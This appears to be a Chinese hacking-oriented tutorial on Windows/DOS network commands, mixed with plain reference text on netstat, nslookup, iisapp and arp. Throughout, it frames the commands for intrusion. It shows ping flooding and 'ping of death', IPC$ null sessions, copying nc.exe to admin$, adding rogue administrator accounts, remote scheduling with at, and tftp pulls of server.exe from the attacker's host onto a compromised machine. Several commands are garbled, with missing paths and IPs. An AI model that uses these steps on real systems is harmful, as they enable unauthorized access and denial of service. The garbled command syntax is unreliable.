DOS網(wǎng)絡指令.doc

一，ping它是用來檢查網(wǎng)絡是否通暢或者網(wǎng)絡連接速度的命令。作為一個生活在網(wǎng)絡上的管理員或者黑客來說，ping命令是第一個必須掌握的DOS命令，它所利用的原理是這樣的：網(wǎng)絡上的機器都有唯一確定的IP地址，我們給目標IP地址發(fā)送一個數(shù)據(jù)包，對方就要返回一個同樣大小的數(shù)據(jù)包，根據(jù)返回的數(shù)據(jù)包我們可以確定目標主機的存在，可以初步判斷目標主機的操作系統(tǒng)等。下面就來看看它的一些常用的操作。先看看幫助吧，在DOS窗口中鍵入：ping /? 回車，。所示的幫助畫面。-t 表示將不間斷向目標IP發(fā)送數(shù)據(jù)包，直到我們強迫其停止。試想，如果你使用100M的寬帶接入，而目標IP是56K的小貓，那么要不了多久，目標IP就因為承受不了這么多的數(shù)據(jù)而掉線，呵呵，一次攻擊就這么簡單的實現(xiàn)了。-l 定義發(fā)送數(shù)據(jù)包的大小，默認為32字節(jié)，我們利用它可以最大定義到65500字節(jié)。結(jié)合上面介紹的-t參數(shù)一起使用，會有更好的效果哦。-n 定義向目標IP發(fā)送數(shù)據(jù)包的次數(shù)，默認為3次。如果網(wǎng)絡速度比較慢，3次對我們來說也浪費了不少時間，因為現(xiàn)在我們的目的僅僅是判斷目標IP是否存在，那么就定義為一次吧。如果-t 參數(shù)和 -n參數(shù)一起使用，ping命令就以放在后面的參數(shù)為標準，比如ping IP -t -n 3，雖然使用了-t參數(shù)，但并不是一直ping下去，而是只ping 3次。另外，ping命令不一定非得ping IP，也可以直接ping主機域名，這樣就可以得到主機的IP。二，nbtstat該命令使用TCP/IP上的NetBIOS顯示協(xié)議統(tǒng)計和當前TCP/IP連接，使用這個命令你可以得到遠程主機的NETBIOS信息，比如用戶名、所屬的工作組、網(wǎng)卡的MAC地址等。在此我們就有必要了解幾個基本的參數(shù)。-a 使用這個參數(shù)，只要你知道了遠程主機的機器名稱，就可以得到它的NETBIOS信息（下同）。-A 這個參數(shù)也可以得到遠程主機的NETBIOS信息，但需要你知道它的IP。-n 列出本地機器的NETBIOS信息。當?shù)玫搅藢Ψ降腎P或者機器名的時候，就可以使用nbtstat命令來進一步得到對方的信息了，這又增加了我們?nèi)肭值谋ｋU系數(shù)。三，netstat這是一個用來查看網(wǎng)絡狀態(tài)的命令，操作簡便功能強大。-a 查看本地機器的所有開放端口，可以有效發(fā)現(xiàn)和預防木馬，可以知道機器所開的服務等信息，如圖4。這里可以看出本地機器開放有FTP服務、Telnet服務、郵件服務、WEB服務等。用法：netstat -a IP。-r 列出當前的路由信息，告訴我們本地機器的網(wǎng)關、子網(wǎng)掩碼等信息。用法：netstat -r IP。四，tracert跟蹤路由信息，使用此命令可以查出數(shù)據(jù)從本地機器傳輸?shù)侥繕酥鳈C所經(jīng)過的所有途徑，這對我們了解網(wǎng)絡布局和結(jié)構(gòu)很有幫助。如圖5。這里說明數(shù)據(jù)從本地機器傳輸?shù)降臋C器上，中間沒有經(jīng)過任何中轉(zhuǎn)，說明這兩臺機器是在同一段局域網(wǎng)內(nèi)。用法：tracert IP。五，net這個命令是網(wǎng)絡命令中最重要的一個，必須透徹掌握它的每一個子命令的用法，因為它的功能實在是太強大了，這簡直就是微軟為我們提供的最好的入侵工具。首先讓我們來看一看它都有那些子命令，鍵入net /?回車。在這里，我們重點掌握幾個入侵常用的子命令。net view使用此命令查看遠程主機的所以共享資源。命令格式為net view IP。net use把遠程主機的某個共享資源影射為本地盤符，圖形界面方便使用，呵呵。命令格式為net use x: IPsharename。上面一個表示把5 IP的共享名為magic的目錄影射為本地的Z盤。下面表示和7建立IPC$連接（net use IPIPC$ password /user:name），建立了IPC$連接后，呵呵，就可以上傳文件了：copy nc.exe admin$，表示把本地目錄下的nc.exe傳到遠程主機，結(jié)合后面要介紹到的其他DOS命令就可以實現(xiàn)入侵了。net start使用它來啟動遠程主機上的服務。當你和遠程主機建立連接后，如果發(fā)現(xiàn)它的什么服務沒有啟動，而你又想利用此服務怎么辦？就使用這個命令來啟動吧。用法：net start servername，如圖9，成功啟動了telnet服務。net stop入侵后發(fā)現(xiàn)遠程主機的某個服務礙手礙腳，怎么辦？利用這個命令停掉就ok了，用法和net start同。net user查看和帳戶有關的情況，包括新建帳戶、刪除帳戶、查看特定帳戶、激活帳戶、帳戶禁用等。這對我們?nèi)肭质呛苡欣模钪匾?，它為我們克隆帳戶提供了前提。鍵入不帶參數(shù)的net user，可以查看所有用戶，包括已經(jīng)禁用的。下面分別講解。1，net user abcd 1234 /add，新建一個用戶名為abcd，密碼為1234的帳戶，默認為user組成員。2，net user abcd /del，將用戶名為abcd的用戶刪除。3，net user abcd /active:no，將用戶名為abcd的用戶禁用。4，net user abcd /active:yes，激活用戶名為abcd的用戶。5，net user abcd，查看用戶名為abcd的用戶的情況六，at這個命令的作用是安排在特定日期或時間執(zhí)行某個特定的命令和程序（知道net time的重要了吧？）。當我們知道了遠程主機的當前時間，就可以利用此命令讓其在以后的某個時間（比如2分鐘后）執(zhí)行某個程序和命令。用法：at time command computer。表示在6點55分時，讓名稱為a-01的計算機開啟telnet服務（這里net start telnet即為開啟telnet服務的命令）。七，ftp大家對這個命令應該比較熟悉了吧？網(wǎng)絡上開放的ftp的主機很多，其中很大一部分是匿名的，也就是說任何人都可以登陸上去?，F(xiàn)在如果你掃到了一臺開放ftp服務的主機（一般都是開了21端口的機器），如果你還不會使用ftp的命令怎么辦？下面就給出基本的ftp命令使用方法。首先在命令行鍵入ftp回車，出現(xiàn)ftp的提示符，這時候可以鍵入help來查看幫助（任何DOS命令都可以使用此方法查看其幫助)。大家可能看到了，這么多命令該怎么用？其實也用不到那么多，掌握幾個基本的就夠了。首先是登陸過程，這就要用到open了，直接在ftp的提示符下輸入open 主機IP ftp端口回車即可，一般端口默認都是21，可以不寫。接著就是輸入合法的用戶名和密碼進行登陸了，這里以匿名ftp為例介紹。用戶名和密碼都是ftp，密碼是不顯示的。當提示* logged in時，就說明登陸成功。這里因為是匿名登陸，所以用戶顯示為Anonymous。接下來就要介紹具體命令的使用方法了。dir 跟DOS命令一樣，用于查看服務器的文件，直接敲上dir回車，就可以看到此ftp服務器上的文件。cd 進入某個文件夾。get 下載文件到本地機器。put 上傳文件到遠程服務器。這就要看遠程ftp服務器是否給了你可寫的權(quán)限了，如果可以，呵呵，該怎么 利用就不多說了，大家就自由發(fā)揮去吧。delete 刪除遠程ftp服務器上的文件。這也必須保證你有可寫的權(quán)限。bye 退出當前連接。quit 同上。八，telnet功能強大的遠程登陸命令，幾乎所有的入侵者都喜歡用它，屢試不爽。為什么？它操作簡單，如同使用自己的機器一樣，只要你熟悉DOS命令，在成功以administrator身份連接了遠程機器后，就可以用它來干你想干的一切了。下面介紹一下使用方法，首先鍵入telnet回車，再鍵入help查看其幫助信息。然后在提示符下鍵入open IP回車，這時就出現(xiàn)了登陸窗口，讓你輸入合法的用戶名和密碼，這里輸入任何密碼都是不顯示的。當輸入用戶名和密碼都正確后就成功建立了telnet連接，這時候你就在遠程主機上具有了和此用戶一樣的權(quán)限，利用DOS命令就可以實現(xiàn)你想干的事情了。這里我使用的超級管理員權(quán)限登陸的。九 NSLOOKUPNSLOOKUP是NT、2000中連接DNS服務器，查詢域名信息的一個非常有用的命令，簡單介紹如下： 實例：查詢163.com域名信息 D:nslookup Default Server: Address: 當前的DNS服務器 ,可用server命令改變。 設置查選條件為所有類型記錄（A、MX等） 查詢域名，注意有. Server: Address: 十 iisapp先來看看iisapp的一些參數(shù)iisapp -a pid可以查出對應的域名反之 iisapp -p domain 查pid的語法iisapp a/AppPoolName | /pAppPoolID參數(shù)/a AppPoolName指定特定應用程序池的名稱。（可選項）/p AppPoolID按 ID 號指定應用程序池。（可選項）注釋如果未指定應用程序池名或 ID，則 iisapp 列出所有運行應用程序。僅當使用 /s 時，才可使用 /u 和 /p 命令行選項。必須同時使用 /p 和 /u 才能提供用戶密碼。Iisext.vbs 執(zhí)行 IIS 管理器中可用的相同操作?？墒褂萌魏我环N工具管理 IIS 網(wǎng)站。點擊運行輸入CMD輸入iisapp -a很奇怪,這里顯示PID的,是用彈出窗口一個個出現(xiàn)的,不知道別人會不,反正我就是這樣,太不利于查看了!注意,希望人BLOG聽說第一次運行,會提示沒有js支持,點擊確定.然后再次運行就可以了.這樣就可以看到pid對應的應用程序池,這個我就沒測試了!這樣吧,先再CMD里面輸入:cd %systemroot%system32然后再輸入:cscrIPt.exe iisapp.vbs -aCMD窗口顯示如下:W3WP.exe PID: 2558 AppPoolId: zzecW3WP.exe PID: 6444 AppPoolId: zzec再任務管理器里面查看占用CPU和內(nèi)存過高進程的PID值,就知道是哪一個應用程序池出了問題,就可以查到具體是什么網(wǎng)站有問題了DOS網(wǎng)絡命令大全 net use ipipc$ /user: 建立IPC空鏈接 net use ipipc$ 密碼 /user:用戶名 建立IPC非空鏈接 net use h: ipc$ 密碼 /user:用戶名 直接登陸后映射對方C：到本地為: net use h: ipc$ 登陸后映射對方C：到本地為: net use ipipc$ /del 刪除IPC鏈接 net use h: /del 刪除映射對方到本地的為H:的映射 net user 用戶名密碼/add 建立用戶 net user guest /active:yes 激活guest用戶 net user 查看有哪些用戶 net user 帳戶名 查看帳戶的屬性 net localgroup *istrators 用戶名 /add 把“用戶”添加到管理員中使其具有管理員權(quán)限,注意：*istrator后加s用復數(shù) net start 查看開啟了哪些服務 net start 服務名 開啟服務；(如:net start telnet， net start schedule) net stop 服務名 停止某服務 net time 目標ip 查看對方時間 net time 目標ip /set 設置本地計算機時間與“目標IP”主機的時間同步,加上參數(shù)/yes可取消確認信息 net view 查看本地局域網(wǎng)內(nèi)開啟了哪些共享 net view ip 查看對方局域網(wǎng)內(nèi)開啟了哪些共享 net config 顯示系統(tǒng)網(wǎng)絡設置 net logoff 斷開連接的共享 net pause 服務名 暫停某服務 net send ip 文本信息 向?qū)Ψ桨l(fā)信息 net ver 局域網(wǎng)內(nèi)正在使用的網(wǎng)絡連接類型和信息 net share 查看本地開啟的共享 net share ipc$ 開啟ipc$共享 net share ipc$ /del 刪除ipc$共享 net share c$ /del 刪除C：共享 net user guest 12345 用guest用戶登陸后用將密碼改為12345 net password 密碼 更改系統(tǒng)登陸密碼 netstat -a 查看開啟了哪些端口,常用netstat -an netstat -n 查看端口的網(wǎng)絡連接情況，常用netstat -an netstat -v 查看正在進行的工作 netstat -p 協(xié)議名 例：netstat -p tcq/ip 查看某協(xié)議使用情況（查看tcp/ip協(xié)議使用情況） netstat -s 查看正在使用的所有協(xié)議使用情況 nbtstat -A ip 對方136到139其中一個端口開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數(shù)-A要大寫 tracert -參數(shù) ip(或計算機名) 跟蹤路由（數(shù)據(jù)包），參數(shù)：“-w數(shù)字”用于設置超時間隔。 ping ip(或域名) 向?qū)Ψ街鳈C發(fā)送默認大小為32字節(jié)的數(shù)據(jù)，參數(shù)：“-l空格數(shù)據(jù)包大小”；“-n發(fā)送數(shù)據(jù)次數(shù)”；“-t”指一直ping。 ping -t -l 65550 ip 死亡之ping(發(fā)送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數(shù)“/all”顯示全部配置信息 tlist -t 以樹行列表顯示進程(為系統(tǒng)的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內(nèi)) kill -F 進程名 加-F參數(shù)后強制結(jié)束某進程(為系統(tǒng)的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內(nèi)) del -F 文件名 加-F參數(shù)后就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統(tǒng)、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統(tǒng)、存檔以外的文件。例如“DEL/AR *.*”表示刪除當前目錄下所有只讀文件，“DEL/A-S *.*”表示刪除當前目錄下除系統(tǒng)文件以外的所有文件 #2 二： del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數(shù)/Q 可取消刪除操作時的系統(tǒng)確認就直接刪除。（二個命令作用相同） move 盤符路徑要移動的文件名存放移動文件的路徑移動后文件名 移動文件,用參數(shù)/y將取消確認移動目錄存在相同文件的提示就直接覆蓋 fc one.txt two.txt 3st.txt 對比二個文件并把不同之處輸出到3st.txt文件中， 和 是重定向命令 at id號 開啟已注冊的某個計劃任務 at /delete 停止所有計劃任務，用參數(shù)/yes則不需要確認就直接停止 at id號 /delete 停止某個已注冊的計劃任務 at 查看所有的計劃任務 at ip time 程序名(或一個命令) /r 在某時間運行對方某程序并重新啟動計算機 finger username host 查看最近有哪些用戶登陸 telnet ip 端口 遠和登陸服務器,默認端口為23 open ip 連接到IP（屬telnet登陸后的命令） telnet 在本機上直接鍵入telnet 將進入本機的telnet copy 路徑文件名1路徑文件名2 /y 復制文件1到指定的目錄為文件2，用參數(shù)/y就同時取消確認你要改寫一份現(xiàn)存目錄文件 copy c:srv.exe ip*$ 復制本地c:srv.exe到對方的*下 cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內(nèi)容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件頭要空三排，參數(shù)：/b指二進制文件，/a指ASCLL格式文件 copy ip*$svv.exe c: 或:copyip*$*.* 復制對方*i$共享下的srv.exe文件（所有文件）至本地C： xcopy 要復制的文件或目錄樹目標地址目錄名 復制文件和目錄樹，用參數(shù)/Y將不提示覆蓋相同文件 tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:server.exe 登陸后，將“IP”的server.exe下載到目標主機c:server.exe 參數(shù)：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送 tftp -i 對方IPput c:server.exe 登陸后，上傳本地c:server.exe至主機DOS下常用網(wǎng)絡命令解釋大全我們經(jīng)?？吹骄W(wǎng)絡高手使用DOS命令測試網(wǎng)絡，DOS網(wǎng)絡命令能解決很多網(wǎng)絡問題。本教程教大家認識一下常見的DOS網(wǎng)絡：ARP、Finger、Nbtstat命令。Arp顯示和修改“地址解析協(xié)議”(ARP) 所使用的到以太網(wǎng)的 IP 或令牌環(huán)物理地址翻譯表。該命令只有在安裝了 TCP/IP協(xié)議之后才可用。arp -a inet_addr -N if_addrarp -d inet_addr if_addrarp -s inet_addr ether_addr if_addr參數(shù)-a通過詢問 TCP/IP 顯示當前 ARP 項。如果指定了 inet_addr，則只顯示指定計算機的 IP 和物理地址。-g與 -a 相同。inet_addr以加點的十進制標記指定 IP 地址。-N顯示由 if_addr 指定的網(wǎng)絡界面 ARP 項。if_addr指定需要修改其地址轉(zhuǎn)換表接口的 IP 地址（如果有的話）。如果不存在，將使用第一個可適用的接口。-d刪除由 inet_addr 指定的項。-s在 ARP 緩存中添加項，將 IP 地址 inet_addr 和物理地址 ether_addr 關聯(lián)。物理地址由以連字符分隔的6個十六進制字節(jié)給定。使用帶點的十進制標記指定 IP 地址。項是永久性的，即在超時到期后項自動從緩存刪除。ether_addr指定物理地址。Finger在運行 Finger 服務的指定系統(tǒng)上顯示有關用戶的信息。根據(jù)遠程系統(tǒng)輸出不同的變量。該命令只有在安裝了 TCP/IP協(xié)議之后才可用。finger -l usercomputer.參數(shù)-l以長列表格式顯示信息。user指定要獲得相關信息的用戶。省略用戶參數(shù)以顯示指定計算機